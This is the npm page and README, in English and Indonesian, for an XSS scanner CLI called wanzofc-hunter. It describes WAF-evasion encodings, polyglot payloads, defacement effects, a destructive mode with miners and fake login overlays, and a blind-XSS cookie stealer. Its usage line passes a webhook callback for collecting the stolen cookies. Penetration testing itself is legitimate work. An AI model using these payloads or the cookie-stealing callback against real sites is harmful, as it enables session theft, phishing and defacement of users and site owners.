wanzofc-hunter
v2.0.3
Published
xss security scanner cli
Downloads
394
Maintainers
Readme
🕸️ wanzofc-hunter v2.0 - Documentation
wanzofc-hunter is an advanced, modular XSS (Cross-Site Scripting) scanner designed for penetration testing. It features automated WAF evasion, polyglot payloads, and visual defacement capabilities.
wanzofc-hunter adalah pemindai XSS (Cross-Site Scripting) modular tingkat lanjut yang dirancang untuk uji penetrasi. Memiliki fitur bypass WAF otomatis, payload polyglot, dan kemampuan deface visual.
🚀 Key Features / Fitur Utama
1. 🛡️ Intelligent Core Engine
- EN: Uses a sequential scanning logic with history tracking to prevent duplicate logs. Distinguishes between Reflected and Stored XSS using a "Clean URL Check" mechanism.
- ID: Menggunakan logika scanning sekuensial dengan pelacakan riwayat untuk mencegah log ganda. Membedakan Reflected dan Stored XSS menggunakan mekanisme "Cek URL Bersih".
2. 🎭 Auto WAF Evasion (Bypass)
- EN: Automatically generates variations for every payload to bypass Firewalls.
- Techniques: URL Encode, Double URL Encode, Hex Encoding, HTML Entity, Base64 Wrapper.
- ID: Secara otomatis membuat variasi untuk setiap payload guna menembus Firewall.
- Teknik: URL Encode, Double URL Encode, Hex Encoding, HTML Entity, Base64 Wrapper.
3. 💣 Polyglot Payloads
- EN: Uses complex payload strings capable of breaking out of multiple contexts (HTML Body, Attribute, Script Tag) simultaneously.
- ID: Menggunakan string payload kompleks yang mampu keluar dari berbagai konteks (HTML Body, Atribut, Tag Script) secara bersamaan.
4. 🎨 Visual & Deface Payloads
- EN: Real-time visual impact payloads to prove vulnerability.
- Effects: CSS Kill (White screen), Rotate Chaos (180° page rotation), Blackout (Dark overlay), Fake Deface (HTML Injection).
- ID: Payload dampak visual nyata untuk membuktikan kerentanan.
- Efek: CSS Kill (Layar putih), Rotate Chaos (Putar halaman 180°), Blackout (Layar hitam), Fake Deface (Injeksi HTML).
5. 👻 Blind XSS & Cookie Stealer
- EN: Supports Out-of-Band (OOB) interaction. Injects payloads that call back to your server/webhook to steal cookies or signal execution.
- ID: Mendukung interaksi Out-of-Band (OOB). Menyuntikkan payload yang memanggil server/webhook kamu untuk mencuri cookie atau memberi sinyal eksekusi.
6. 📂 Special Vectors (File & Input)
- EN: Targeted payloads for specific entry points.
- File Upload: Double extension bypass (
image.jpg<script>.gif), Null Byte injection. - Input Fields: Username limits, Bio/Profile injection, Address fields.
- File Upload: Double extension bypass (
- ID: Payload yang ditargetkan untuk titik masuk khusus.
- Upload File: Bypass ekstensi ganda (
image.jpg<script>.gif), Injeksi Null Byte. - Kolom Input: Limit username, injeksi Bio/Profil, kolom Alamat.
- Upload File: Bypass ekstensi ganda (
7. 🧨 Destructive Mode
- EN: Aggressive payloads for stress testing (Use with caution).
- Types: Loop Alert (Browser Hang), Miner (CPU Stress), Phishing Overlay (Fake Login Form), Redirect Loop.
- ID: Payload agresif untuk stress testing (Gunakan dengan hati-hati).
- Tipe: Loop Alert (Browser Hang), Miner (CPU Stress), Phishing Overlay (Form Login Palsu), Redirect Loop.
8. 🏗️ DOM XSS Scanner
- EN: Detects client-side vulnerabilities by analyzing DOM sinks (
location.hash,document.write) and sources. - ID: Mendeteksi kerentanan sisi klien dengan menganalisis sink DOM (
location.hash,document.write) dan sumbernya.
9. 🧪 Responsive Vulnerable Lab
- EN: Includes a built-in local server (
server.js) with a responsive Dark Mode UI. Simulates Reflected, Stored, and DOM XSS scenarios perfectly. - ID: Termasuk server lokal bawaan (
server.js) dengan UI Dark Mode yang responsif. Mensimulasikan skenario Reflected, Stored, dan DOM XSS dengan sempurna.
📖 Usage / Cara Penggunaan
Standard Scan (Reflected/DOM)
node bin/wanzofc-hunter --url "http://target.com/search?q={xss}"Blind XSS / Stealer
node bin/wanzofc-hunter --url "http://target.com/?q={xss}" --callback "http://your-webhook.site/log"Specific Target (File Upload)
node bin/wanzofc-hunter --url "http://target.com/upload?filename={xss}"Run Vulnerable Lab (Localhost)
# Terminal 1
node server.js
# Terminal 2
node bin/wanzofc-hunter --url "http://localhost:3000/?q={xss}"📂 Project Structure / Struktur Proyek
- bin/: Executable CLI entry point.
- cli/: CLI wrapper, help menu, banner.
- src/core/:
engine.js: Main orchestrator.scanner.js: Scanning logic & detection algorithms.
- src/detectors/: Logic for Reflected, Stored, and DOM detection.
- src/payloads/:
basic/: Simple script tags.polyglot/: Multi-context bypasses.visual/: Defacement & CSS manipulation.destructive/: Miners, loopers, overlays.special/: SVG, Iframe, Audio vectors.files/: Filename manipulation.
- src/utils/:
encoder.js: WAF evasion logic (Hex, Base64, etc).http-client.js: HTTP GET/POST handler.
Author: WanzOFC Version: 2.0.0
